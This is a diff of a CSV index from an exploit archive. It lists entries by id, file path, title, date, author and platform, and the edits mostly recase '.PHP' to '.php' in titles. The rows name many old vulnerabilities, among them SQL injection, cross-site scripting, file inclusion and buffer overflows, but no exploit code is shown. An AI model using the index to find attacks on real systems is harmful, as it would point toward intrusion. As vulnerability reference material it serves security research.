25557,platforms/windows/remote/25557.txt,"HP OpenView Radia Management Portal 1.0/2.0 - Remote Command Execution Vulnerability",2005-04-28,"David Morgan",windows,remote,0 25558,platforms/php/webapps/25558.txt,"Notes Module for PHPBB SQL Injection Vulnerability",2005-04-28,"James Bercegay",php,webapps,0 25559,platforms/multiple/remote/25559.txt,"Oracle Application Server 9.0 HTTP Service Mod_Access Restriction Bypass Vulnerability",2005-04-28,"Alexander Kornbrust",multiple,remote,0 -25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore Closeup.PHP Image Parameter Cross-Site Scripting Vulnerability",2005-04-28,Lostmon,php,webapps,0 +25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore Closeup.php Image Parameter Cross-Site Scripting Vulnerability",2005-04-28,Lostmon,php,webapps,0 25561,platforms/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache Arbitrary File Corruption Vulnerability",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25562,platforms/multiple/remote/25562.txt,"Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25563,platforms/multiple/remote/25563.txt,"Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting Vulnerability",2005-04-28,"Alexander Kornbrust",multiple,remote,0 @@ -22741,30 +22741,30 @@ id,file,description,date,author,platform,type,port 25611,platforms/windows/dos/25611.txt,"Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention Vulnerability",2005-06-14,d.schroeter@gmx.de,linux,remote,0 -25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 Index.PHP Cross-Site Scripting Vulnerability",2005-06-14,An0nym0uS,php,webapps,0 +25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 Index.php Cross-Site Scripting Vulnerability",2005-06-14,An0nym0uS,php,webapps,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure Vulnerability",2005-06-15,"Sverre H. Huseby",windows,remote,0 25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 Lang Argument File Disclosure Vulnerability",2005-06-15,D_BuG,php,webapps,0 25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0 25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0 25612,platforms/php/webapps/25612.txt,"myBloggie 2.1 index.php year Parameter XSS",2005-05-05,"Alberto Trivero",php,webapps,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability",2005-05-05,"Alexander Kornbrust",multiple,remote,0 -25614,platforms/php/webapps/25614.txt,"MidiCart PHP Search_List.PHP SearchString Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25615,platforms/php/webapps/25615.txt,"MidiCart PHP Item_List.PHP MainGroup Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25616,platforms/php/webapps/25616.txt,"MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25617,platforms/php/webapps/25617.txt,"MidiCart PHP Item_Show.PHP Code_No Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25618,platforms/php/webapps/25618.txt,"MidiCart PHP Search_List.PHP SearchString Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25619,platforms/php/webapps/25619.txt,"MidiCart PHP Item_List.PHP SecondGroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25620,platforms/php/webapps/25620.txt,"MidiCart PHP Item_List.PHP Maingroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25614,platforms/php/webapps/25614.txt,"MidiCart PHP Search_List.php SearchString Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25615,platforms/php/webapps/25615.txt,"MidiCart PHP Item_List.php MainGroup Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25616,platforms/php/webapps/25616.txt,"MidiCart PHP Item_List.php SecondGroup Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25617,platforms/php/webapps/25617.txt,"MidiCart PHP Item_Show.php Code_No Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25618,platforms/php/webapps/25618.txt,"MidiCart PHP Search_List.php SearchString Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25619,platforms/php/webapps/25619.txt,"MidiCart PHP Item_List.php SecondGroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 +25620,platforms/php/webapps/25620.txt,"MidiCart PHP Item_List.php Maingroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal Vulnerability",2005-05-05,dr_insane,windows,remote,0 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 Admin.CGI EntryID Cross-Site Scripting Vulnerability",2005-05-05,"Spy Hat",cgi,webapps,0 -25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 OUT.PHP SQL Injection Vulnerability",2005-05-06,Kold,php,webapps,0 +25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 OUT.php SQL Injection Vulnerability",2005-05-06,Kold,php,webapps,0 25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)",2005-05-06,"Luca Ercoli",unix,remote,0 25625,platforms/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)",2005-05-11,K-sPecial,unix,remote,0 -25626,platforms/osx/remote/25626.c,"4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability",2005-05-06,"Braden Thomas",osx,remote,0 +25626,platforms/osx/remote/25626.c,"4D WebStar 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow Vulnerability",2005-05-06,"Braden Thomas",osx,remote,0 25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload Vulnerability",2005-05-06,tjomi4,php,remote,0 -25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x URL Tag BBCode.PHP Vulnerability",2005-05-09,Papados,jsp,webapps,0 +25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x URL Tag BBCode.php Vulnerability",2005-05-09,Papados,jsp,webapps,0 25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 FTP Commands Remote Buffer Overflow Vulnerability",2008-05-08,Samsta,windows,dos,0 -25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 Index.PHP Entry Parameter SQL Injection Vulnerability",2005-05-09,"Spy Hat",php,webapps,0 +25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 Index.php Entry Parameter SQL Injection Vulnerability",2005-05-09,"Spy Hat",php,webapps,0 25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 CGISSI.EXE Remote Buffer Overflow Vulnerability",2005-05-09,"Tan Chew Keong",windows,dos,0 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board Directory Traversal Vulnerability",2005-05-09,"SoulBlack Group",cgi,webapps,0 25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x Smiley Icon Location Remote Denial of Service Vulnerability",2005-05-09,fjlj@wvi.com,windows,dos,0 @@ -22774,27 +22774,27 @@ id,file,description,date,author,platform,type,port 25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 catalog.php id Parameter XSS",2005-05-09,Lostmon,php,webapps,0 25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 catalog.php id Parameter SQL Injection",2005-05-09,Lostmon,php,webapps,0 25639,platforms/php/webapps/25639.txt,"PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-09,"SecuBox fRoGGz",php,webapps,0 -25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 Profil.PHP SQL Injection Vulnerability",2005-05-09,"SecuBox fRoGGz",php,webapps,0 -25641,platforms/php/webapps/25641.txt,"WowBB 1.6 View_User.PHP SQL Injection Vulnerability",2005-05-10,Megasky,php,webapps,0 +25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 Profil.php SQL Injection Vulnerability",2005-05-09,"SecuBox fRoGGz",php,webapps,0 +25641,platforms/php/webapps/25641.txt,"WowBB 1.6 View_User.php SQL Injection Vulnerability",2005-05-10,Megasky,php,webapps,0 25642,platforms/php/webapps/25642.txt,"NukeET 3.0/3.1 Base64 Codigo Variable Cross-Site Scripting Vulnerability",2005-05-10,"Suko and Lostmon",php,webapps,0 25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 Unauthorized JPEG Image Access Vulnerability",2005-05-10,"Tirath Rai",windows,remote,0 -25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 Request.PHP Directory Traversal Vulnerability",2005-05-10,Heintz,php,webapps,0 -25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 Forum_viewforum.PHP SQL Injection Vulnerability",2005-05-10,Heintz,php,webapps,0 +25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 Request.php Directory Traversal Vulnerability",2005-05-10,Heintz,php,webapps,0 +25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 Forum_viewforum.php SQL Injection Vulnerability",2005-05-10,Heintz,php,webapps,0 25646,platforms/windows/remote/25646.txt,"MyServer 0.8 - Cross-Site Scripting Vulnerability",2005-05-10,dr_insane,windows,remote,0 25647,platforms/linux/local/25647.sh,"Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Vulnerability",2005-05-11,"Paul Starzetz",linux,local,0 25648,platforms/cgi/remote/25648.txt,"neteyes nexusway border gateway - Multiple Vulnerabilities",2005-05-11,pokley,cgi,remote,0 25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 -25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 Index.PHP Cross-Site Scripting Vulnerability",2005-05-11,Lostmon,php,webapps,0 +25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 Index.php Cross-Site Scripting Vulnerability",2005-05-11,Lostmon,php,webapps,0 25651,platforms/asp/webapps/25651.txt,"MaxWebPortal 1.3x post.asp Multiple Parameter XSS",2005-05-11,Zinho,asp,webapps,0 25652,platforms/windows/remote/25652.txt,"APG Technology ClassMaster Unauthorized Folder Access Vulnerability",2005-05-12,"Alex Garrett",windows,remote,0 -25653,platforms/php/webapps/25653.txt,"DirectTopics 2 Topic.PHP SQL Injection Vulnerability",2005-05-12,"Morinex Eneco",php,webapps,0 -25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 ViewForum.PHP Cross-Site Scripting Vulnerability",2005-05-13,"Morinex Eneco",php,webapps,0 -25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 ViewForum.PHP SQL Injection Vulnerability",2005-05-13,"Morinex Eneco",php,webapps,0 -25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 Read.PHP SQL Injection Vulnerability",2005-05-13,Megasky,php,webapps,0 -25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 Member.PHP Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 +25653,platforms/php/webapps/25653.txt,"DirectTopics 2 Topic.php SQL Injection Vulnerability",2005-05-12,"Morinex Eneco",php,webapps,0 +25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 ViewForum.php Cross-Site Scripting Vulnerability",2005-05-13,"Morinex Eneco",php,webapps,0 +25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 ViewForum.php SQL Injection Vulnerability",2005-05-13,"Morinex Eneco",php,webapps,0 +25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 Read.php SQL Injection Vulnerability",2005-05-13,Megasky,php,webapps,0 +25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 Member.php Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 25658,platforms/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 URL Handler Remote Denial of Service Vulnerability",2005-05-13,"Torseq Tech",windows,dos,0 -25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 Start-Page.CSS.PHP3 - Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 -25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 Style.CSS.PHP3 - Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 +25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 Start-Page.CSS.php3 - Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 +25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 Style.CSS.php3 - Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery Database Download Vulnerability",2005-05-01,"g0rellazz G0r",asp,webapps,0 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script CategoryID SQL Injection Vulnerability",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22816,14 +22816,14 @@ id,file,description,date,author,platform,type,port 25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 jgs_portal_sponsor.php id Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25680,platforms/windows/dos/25680.txt,"War Times Remote Game Server Denial of Service Vulnerability",2005-05-17,"Luigi Auriemma",windows,dos,0 25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 X-ForwordedFor PHP Script Code Injection Vulnerability",2005-05-24,"Network security team",php,webapps,0 -25682,platforms/php/webapps/25682.txt,"WordPress 1.5 - Post.PHP Cross-Site Scripting Vulnerability",2005-05-17,"Thomas Waldegger",php,webapps,0 +25682,platforms/php/webapps/25682.txt,"WordPress 1.5 - Post.php Cross-Site Scripting Vulnerability",2005-05-17,"Thomas Waldegger",php,webapps,0 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router Remote Authentication Bypass Vulnerability",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 API MimeMessage Infromation Disclosure Vulnerability",2005-05-19,"Ricky Latt",jsp,webapps,0 25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Include Vulnerability",2005-05-19,"Ingvar Gilbert",php,webapps,0 25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 Error Generation Remote Buffer Overflow Vulnerability",2005-05-20,"Shaun Colley",freebsd,remote,0 25688,platforms/linux/local/25688.txt,"Gedit 2.x Filename Format String Vulnerability",2005-05-30,jsk:exworm,linux,local,0 -25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.PHP Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 +25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.php Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 ID Parameter SQL Injection Vulnerability",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 25692,platforms/multiple/dos/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,dos,0 @@ -22839,7 +22839,7 @@ id,file,description,date,author,platform,type,port 25701,platforms/asp/webapps/25701.txt,"Spread The Word Multiple SQL Injection Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 25703,platforms/solaris/local/25703.txt,"Active News Manager LOGIN.ASP SQL Injection Vulnerability",2005-05-25,Romty,solaris,local,0 -25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.PHP Remote File Include Vulnerability",2005-05-25,"rash ilusion",php,webapps,0 +25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.php Remote File Include Vulnerability",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 Login.ASP SQL Injection Vulnerability",2005-05-25,Romty,asp,webapps,0 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow Vulnerability",2004-08-10,infamous41md,linux,remote,0 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 @@ -22931,15 +22931,15 @@ id,file,description,date,author,platform,type,port 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 LOGIN.ASP SQL Injection Vulnerability",2005-06-01,"Dj romty",asp,webapps,0 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0 -25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0 +25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.php Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0 -25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0 +25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure Vulnerability",2005-06-06,"Miklos Szeredi",linux,local,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability",2005-06-06,Romty,asp,webapps,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service Vulnerability",2005-06-06,"Luigi Auriemma",multiple,dos,0 -25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x Remote and Local File Include Vulnerabilities",2005-06-06,anonymous,php,webapps,0 -25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x View.PHP Cross-Site Scripting Vulnerability",2005-06-06,anonymous,php,webapps,0 -25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x Upload.PHP Directory Traversal Vulnerability",2005-06-06,anonymous,php,webapps,0 +25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Remote and Local File Include Vulnerabilities",2005-06-06,anonymous,php,webapps,0 +25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x View.php Cross-Site Scripting Vulnerability",2005-06-06,anonymous,php,webapps,0 +25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x Upload.php Directory Traversal Vulnerability",2005-06-06,anonymous,php,webapps,0 25795,platforms/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 viewPrd.asp idcategory Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25796,platforms/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 editCategories.asp lid Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25797,platforms/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 modCustomCardPaymentOpt.asp idc Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 @@ -22995,9 +22995,9 @@ id,file,description,date,author,platform,type,port 25854,platforms/php/webapps/25854.txt,"PAFaq Question Cross-Site Scripting Vulnerability",2005-06-20,"James Bercegay",php,webapps,0 25855,platforms/asp/webapps/25855.txt,"I-Gallery Folder Argument Cross-Site Scripting Vulnerability",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25856,platforms/php/webapps/25856.txt,"PAFaq Administrator Username SQL Injection Vulnerability",2005-06-20,"James Bercegay",php,webapps,0 -25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 Config_Settings.PHP Remote File Include Vulnerability",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 +25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 Config_Settings.php Remote File Include Vulnerability",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro Multiple SQL Injection Vulnerabilities",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.PHP Remote File Include Vulnerability",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 +25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.php Remote File Include Vulnerability",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 type.asp iType Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 productDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 productEdit.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 @@ -23013,7 +23013,7 @@ id,file,description,date,author,platform,type,port 25872,platforms/asp/webapps/25872.txt,"DUware DUclassmate 1.x default.asp iState Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x edit.asp iPro Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 LOGIN.ASP SQL Injection Vulnerability",2005-06-22,anonymous,asp,webapps,0 -25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x Profile.PHP Cross-Site Scripting Vulnerability",2005-06-23,"Elzar Stuffenbach",php,webapps,0 +25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x Profile.php Cross-Site Scripting Vulnerability",2005-06-23,"Elzar Stuffenbach",php,webapps,0 25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 IMG Tag XSS",2005-06-23,1dt.w0lf,php,webapps,0 25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 menu_header.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 @@ -23055,11 +23055,11 @@ id,file,description,date,author,platform,type,port 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 -25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 +25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.php Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0 25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution Vulnerability",2005-06-29,blahplok,cgi,webapps,0 -25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.PHP SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0 +25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.php SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0 25920,platforms/cgi/webapps/25920.pl,"Community Link Pro Login.CGI File Parameter Remote Command Execution Vulnerability",2005-06-29,spher3,cgi,webapps,0 25921,platforms/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 Ignore Command Remote Denial of Service Vulnerability",2005-06-29,"Luigi Auriemma",windows,dos,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 20review.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 @@ -23076,15 +23076,15 @@ id,file,description,date,author,platform,type,port 25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 CID Parameter SQL Injection Vulnerability",2005-07-04,Easyex,php,webapps,0 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 CID Parameter Cross-Site Scripting Vulnerability",2005-07-04,Easyex,php,webapps,0 25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer Remote Buffer Overflow Vulnerability",2005-06-28,fRoGGz,windows,dos,0 -25937,platforms/php/webapps/25937.txt,"Plague News System 0.7 Delete.PHP Access Restriction Bypass Vulnerability",2005-07-04,Easyex,php,webapps,0 +25937,platforms/php/webapps/25937.txt,"Plague News System 0.7 Delete.php Access Restriction Bypass Vulnerability",2005-07-04,Easyex,php,webapps,0 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x Login Form Directory Traversal Vulnerability",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 Read.CGI Remote Command Execution Vulnerability",2005-07-05,AcidCrash,cgi,webapps,0 -25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 Index.PHP Cross-Site Scripting Vulnerability",2005-07-05,mozako,php,webapps,0 -25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.PHP3 - Remote File Include Vulnerability",2005-07-05,"SoulBlack Group",php,webapps,0 +25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 Index.php Cross-Site Scripting Vulnerability",2005-07-05,mozako,php,webapps,0 +25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.php3 - Remote File Include Vulnerability",2005-07-05,"SoulBlack Group",php,webapps,0 25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Include Vulnerability",2005-07-06,"Stefan Esser",php,webapps,0 25943,platforms/linux/dos/25943.txt,"OFTPD 0.3.x User Command Buffer Overflow Vulnerability",2005-07-06,new.security@gmail.com,linux,dos,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 Mail Template Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,multiple,remote,0 -25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0 +25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.php Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System 